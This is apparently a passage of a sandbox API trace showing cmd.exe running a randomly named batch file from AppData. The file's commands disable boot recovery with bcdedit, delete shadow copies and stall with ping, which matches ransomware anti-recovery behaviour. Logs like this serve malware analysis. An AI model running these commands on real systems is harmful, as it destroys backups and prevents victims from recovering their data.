returned -3 [0195.105] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0195.105] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0195.105] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0195.105] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0195.105] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0195.105] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0195.105] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0195.105] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0195.105] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0195.105] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0195.105] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0195.105] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0195.106] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0195.106] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0195.106] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0195.106] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0195.106] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0195.106] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0195.106] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0195.106] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0195.106] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0195.106] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0195.106] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0195.106] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0195.106] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0195.106] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0195.106] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0195.106] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0195.106] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0195.106] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0195.106] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0195.106] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0195.106] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0195.106] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0195.106] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0195.106] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0195.106] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0195.106] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0195.106] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0195.106] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0195.106] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0195.106] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0195.106] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0195.106] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0195.106] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0195.106] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0195.106] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0195.106] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0195.106] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0195.106] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0195.107] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0195.107] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0195.107] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0195.107] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0195.107] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0195.107] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0195.107] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0195.107] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0195.107] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0195.107] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0195.107] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0195.107] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0195.107] FindClose (in: hFindFile=0x490fd8 | out: hFindFile=0x490fd8) returned 1 [0195.107] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0195.107] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0195.108] GetConsoleTitleW (in: lpConsoleTitle=0x28ef58, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.108] InitializeProcThreadAttributeList (in: lpAttributeList=0x28ede0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28eea8 | out: lpAttributeList=0x28ede0, lpSize=0x28eea8) returned 1 [0195.108] UpdateProcThreadAttribute (in: lpAttributeList=0x28ede0, dwFlags=0x0, Attribute=0x60001, lpValue=0x28eea0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28ede0, lpPreviousValue=0x0) returned 1 [0195.108] GetStartupInfoW (in: lpStartupInfo=0x28ed9c | out: lpStartupInfo=0x28ed9c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0195.108] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0195.108] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28ee3c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28ee88 | out: lpCommandLine="bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures", lpProcessInformation=0x28ee88*(hProcess=0x58, hThread=0x54, dwProcessId=0xb40, dwThreadId=0xac4)) returned 1 [0195.115] CloseHandle (hObject=0x54) returned 1 [0195.115] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0195.115] GetEnvironmentStringsW () returned 0x492c28* [0195.116] FreeEnvironmentStringsW (penv=0x492c28) returned 1 [0195.116] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0 [0195.308] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0x28ed7c | out: lpExitCode=0x28ed7c*=0x0) returned 1 [0195.308] CloseHandle (hObject=0x58) returned 1 [0195.308] _vsnwprintf (in: _Buffer=0x28eec4, _BufferCount=0x13, _Format="%08X", _ArgList=0x28ed88 | out: _Buffer="00000000") returned 8 [0195.308] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0195.308] GetEnvironmentStringsW () returned 0x492c28* [0195.308] FreeEnvironmentStringsW (penv=0x492c28) returned 1 [0195.308] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0195.308] GetEnvironmentStringsW () returned 0x492c28* [0195.308] FreeEnvironmentStringsW (penv=0x492c28) returned 1 [0195.308] DeleteProcThreadAttributeList (in: lpAttributeList=0x28ede0 | out: lpAttributeList=0x28ede0) [0195.308] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.308] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0195.308] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.308] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0195.309] _get_osfhandle (_FileHandle=0) returned 0x3 [0195.309] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0195.309] SetConsoleInputExeNameW () returned 0x1 [0195.309] GetConsoleOutputCP () returned 0x1b5 [0195.309] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0195.309] SetThreadUILanguage (LangId=0x0) returned 0x409 [0195.309] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0195.309] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0195.309] _get_osfhandle (_FileHandle=3) returned 0x58 [0195.309] SetFilePointer (in: hFile=0x58, lDistanceToMove=455, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1c7 [0195.310] _get_osfhandle (_FileHandle=3) returned 0x58 [0195.310] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1c7 [0195.310] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f6a8*=0x75, lpOverlapped=0x0) returned 1 [0195.311] SetFilePointer (in: hFile=0x58, lDistanceToMove=477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1dd [0195.311] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=22, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="ping -n 10 localhost\r\ne delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\natuspolicy ignoreallfailures\"\r\n") returned 22 [0195.312] _tell (_FileHandle=3) returned 477 [0195.312] _close (_FileHandle=3) returned 0 [0195.312] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f47c | out: _Buffer="\r\n") returned 2 [0195.312] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.312] GetFileType (hFile=0x7) returned 0x2 [0195.312] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0195.312] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f43c | out: lpMode=0x28f43c) returned 1 [0195.312] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.313] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f468*=0x2) returned 1 [0195.313] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0195.313] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0195.313] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0195.313] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f478 | out: _Buffer=">") returned 1 [0195.313] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.313] GetFileType (hFile=0x7) returned 0x2 [0195.313] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0195.313] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f440 | out: lpMode=0x28f440) returned 1 [0195.314] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.314] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f46c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x28f46c*=0x19) returned 1 [0195.314] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.314] GetFileType (hFile=0x7) returned 0x2 [0195.314] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0195.314] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6c4 | out: lpMode=0x28f6c4) returned 1 [0195.314] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.314] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x480ff8*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x28f6f0, lpReserved=0x0 | out: lpBuffer=0x480ff8*, lpNumberOfCharsWritten=0x28f6f0*=0x4) returned 1 [0195.314] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f6fc | out: _Buffer=" -n 10 localhost ") returned 17 [0195.314] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.314] GetFileType (hFile=0x7) returned 0x2 [0195.314] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0195.314] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6bc | out: lpMode=0x28f6bc) returned 1 [0195.315] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.315] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x28f6e8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f6e8*=0x11) returned 1 [0195.315] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f71c | out: _Buffer="\r\n") returned 2 [0195.315] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.315] GetFileType (hFile=0x7) returned 0x2 [0195.315] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0195.315] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6dc | out: lpMode=0x28f6dc) returned 1 [0195.315] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.315] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f708, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f708*=0x2) returned 1 [0195.316] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0195.316] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0195.316] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0195.316] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0195.316] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0195.316] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0195.316] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0195.316] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0195.316] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0195.316] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0195.316] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0195.316] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0195.316] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0195.316] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0195.316] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0195.316] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0195.316] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0195.316] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0195.316] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0195.316] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0195.316] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0195.316] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0195.316] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0195.316] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0195.316] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0195.316] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0195.316] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0195.316] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0195.316] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0195.316] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0195.316] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0195.316] _wcsicmp (_String1="ping", _String2="START") returned -3 [0195.316] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0195.316] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0195.316] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0195.316] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0195.316] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0195.316] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0195.317] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0195.317] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0195.317] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0195.317] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0195.317] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0195.317] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0195.317] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0195.317] FindClose (in: hFindFile=0x491de0 | out: hFindFile=0x491de0) returned 1 [0195.317] FindClose (in: hFindFile=0x491de0 | out: hFindFile=0x491de0) returned 1 [0195.317] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0195.317] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0195.318] GetConsoleTitleW (in: lpConsoleTitle=0x28f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.318] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0195.318] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0195.318] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0195.318] FindClose (in: hFindFile=0x4921c8 | out: hFindFile=0x4921c8) returned 1 [0195.318] FindClose (in: hFindFile=0x4921c8 | out: hFindFile=0x4921c8) returned 1 [0195.318] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0195.318] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0195.318] GetConsoleTitleW (in: lpConsoleTitle=0x28f020, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.318] InitializeProcThreadAttributeList (in: lpAttributeList=0x28eea8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28ef70 | out: lpAttributeList=0x28eea8, lpSize=0x28ef70) returned 1 [0195.318] UpdateProcThreadAttribute (in: lpAttributeList=0x28eea8, dwFlags=0x0, Attribute=0x60001, lpValue=0x28ef68, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28eea8, lpPreviousValue=0x0) returned 1 [0195.318] GetStartupInfoW (in: lpStartupInfo=0x28ee64 | out: lpStartupInfo=0x28ee64*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0195.319] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0195.319] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 10 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28ef04*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 10 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28ef50 | out: lpCommandLine="ping -n 10 localhost", lpProcessInformation=0x28ef50*(hProcess=0x54, hThread=0x58, dwProcessId=0xadc, dwThreadId=0xb90)) returned 1 [0195.320] CloseHandle (hObject=0x58) returned 1 [0195.320] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0195.320] GetEnvironmentStringsW () returned 0x490940* [0195.320] FreeEnvironmentStringsW (penv=0x490940) returned 1 [0195.320] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0207.887] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x28ee44 | out: lpExitCode=0x28ee44*=0x0) returned 1 [0207.887] CloseHandle (hObject=0x54) returned 1 [0207.887] _vsnwprintf (in: _Buffer=0x28ef8c, _BufferCount=0x13, _Format="%08X", _ArgList=0x28ee50 | out: _Buffer="00000000") returned 8 [0207.887] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0207.887] GetEnvironmentStringsW () returned 0x490940* [0207.888] FreeEnvironmentStringsW (penv=0x490940) returned 1 [0207.888] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0207.888] GetEnvironmentStringsW () returned 0x490940* [0207.888] FreeEnvironmentStringsW (penv=0x490940) returned 1 [0207.888] DeleteProcThreadAttributeList (in: lpAttributeList=0x28eea8 | out: lpAttributeList=0x28eea8) [0207.888] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.888] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0207.888] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.888] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0207.888] _get_osfhandle (_FileHandle=0) returned 0x3 [0207.888] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0207.888] SetConsoleInputExeNameW () returned 0x1 [0207.888] GetConsoleOutputCP () returned 0x1b5 [0207.888] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0207.888] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.888] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0207.889] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0207.889] _get_osfhandle (_FileHandle=3) returned 0x54 [0207.889] SetFilePointer (in: hFile=0x54, lDistanceToMove=477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1dd [0207.889] _get_osfhandle (_FileHandle=3) returned 0x54 [0207.889] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1dd [0207.889] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f6a8*=0x5f, lpOverlapped=0x0) returned 1 [0207.890] SetFilePointer (in: hFile=0x54, lDistanceToMove=503, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1f7 [0207.890] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=26, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="echo CiOHhXJTCFVtKQz1Zuv\r\nlete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\natuspolicy ignoreallfailures\"\r\n") returned 26 [0207.891] _tell (_FileHandle=3) returned 503 [0207.891] _close (_FileHandle=3) returned 0 [0207.891] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f47c | out: _Buffer="\r\n") returned 2 [0207.891] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.891] GetFileType (hFile=0x7) returned 0x2 [0207.891] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.891] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f43c | out: lpMode=0x28f43c) returned 1 [0207.891] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.891] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f468*=0x2) returned 1 [0207.892] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0207.892] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.892] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0207.892] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f478 | out: _Buffer=">") returned 1 [0207.892] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.892] GetFileType (hFile=0x7) returned 0x2 [0207.892] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.892] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f440 | out: lpMode=0x28f440) returned 1 [0207.892] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.892] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f46c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x28f46c*=0x19) returned 1 